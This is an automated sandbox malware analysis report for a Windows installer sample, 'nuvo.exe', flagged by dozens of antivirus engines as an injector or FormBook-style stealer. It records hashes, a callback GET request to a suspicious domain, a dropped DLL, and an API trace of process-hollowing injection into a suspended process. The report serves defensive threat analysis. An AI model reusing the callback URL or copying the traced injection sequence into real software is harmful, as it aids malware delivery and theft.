popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

nuvo.exe

NSIS Malicious Library UPX PE File DLL PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 20, 2022, 10:30 a.m. Jan. 20, 2022, 10:37 a.m.
Size 296.6KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 02e260d43fa91e067838b68b19435124
SHA256 8392408d685d10ddf024a7e4f47976e03a00fd787bd4ee0932766c4b9b278bc0
CRC32 7A66DA8E
ssdeep 6144:owcr6g0ijI65JNKrNYpjegIhRzGKHk7F98ZnsJ6:Y06I652Cpje/RSX8ZnsJ6
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • NSIS_Installer - Null Soft Installer

Name Response Post-Analysis Lookup
www.ponto-bras.space
CNAME shops.myshopify.com
A 23.227.38.74
23.227.38.74
www.xianshucai.net
www.khojcity.com
www.xn--3jst70hg8f.com
IP Address Status Action
164.124.101.2 Active Moloch
23.227.38.74 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.ponto-bras.space/nk6l/?wPT=dUEi0UXZejEMtd9h224Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4axtDfgTTQPQWOziaGp1&oZN=6lSdIlC8F
request GET http://www.ponto-bras.space/nk6l/?wPT=dUEi0UXZejEMtd9h224Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4axtDfgTTQPQWOziaGp1&oZN=6lSdIlC8F
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2300
stack_dep_bypass: 1
stack_pivoted: 0
heap_dep_bypass: 1
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0018e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00950000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nsu89E2.tmp\kwtfjxgfmlt.dll
file C:\Users\test22\AppData\Local\Temp\nsu89E2.tmp\kwtfjxgfmlt.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 192512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001ec
1 0 0
Process injection Process 2300 called NtSetContextThread to modify thread in remote process 2412
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1999372740
registers.esp: 1638384
registers.edi: 0
registers.eax: 4321520
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001e8
process_identifier: 2412
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2416
thread_handle: 0x000001e8
process_identifier: 2412
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\nuvo.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\nuvo.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\nuvo.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001ec
1 1 0

NtGetContextThread

 thread_handle: 0x000001e8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 192512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001ec
1 0 0

NtSetContextThread

 registers.eip: 1999372740
registers.esp: 1638384
registers.edi: 0
registers.eax: 4321520
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001e8
process_identifier: 2412
1 0 0
Lionic Trojan.Win32.Generic.4!c
MicroWorld-eScan Trojan.Risis.1.Gen
FireEye Trojan.Risis.1.Gen
Cylance Unsafe
Sangfor Trojan.Win32.Injector.EQYI
Alibaba Trojan:Application/Generic.b19bdc02
Cybereason malicious.43fa91
Arcabit Zum.Androm.1
Cyren W32/Injector.ATK.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.EQYI
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.Risis.1.Gen
SUPERAntiSpyware Trojan.Agent/Gen-AdInst
Avast Win32:PWSX-gen [Trj]
Emsisoft Trojan.Risis.1.Gen (B)
DrWeb Trojan.Inject4.24715
McAfee-GW-Edition BehavesLike.Win32.Dropper.dc
Sophos Mal/Generic-S
Ikarus Win32.Outbreak
Webroot W32.Trojan.Risis.1
Avira TR/Injector.glgbe
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
GData Win32.Trojan-Stealer.FormBook.O5BP78
Cynet Malicious (score: 100)
McAfee Artemis!02E260D43FA9
MAX malware (ai score=86)
VBA32 BScope.TrojanPSW.Banker
Malwarebytes Trojan.Injector
SentinelOne Static AI - Suspicious PE
Fortinet W32/Kryptik.EQXP!tr
BitDefenderTheta Gen:NN.ZedlaF.34160.fu4@aug6xaji
AVG Win32:PWSX-gen [Trj]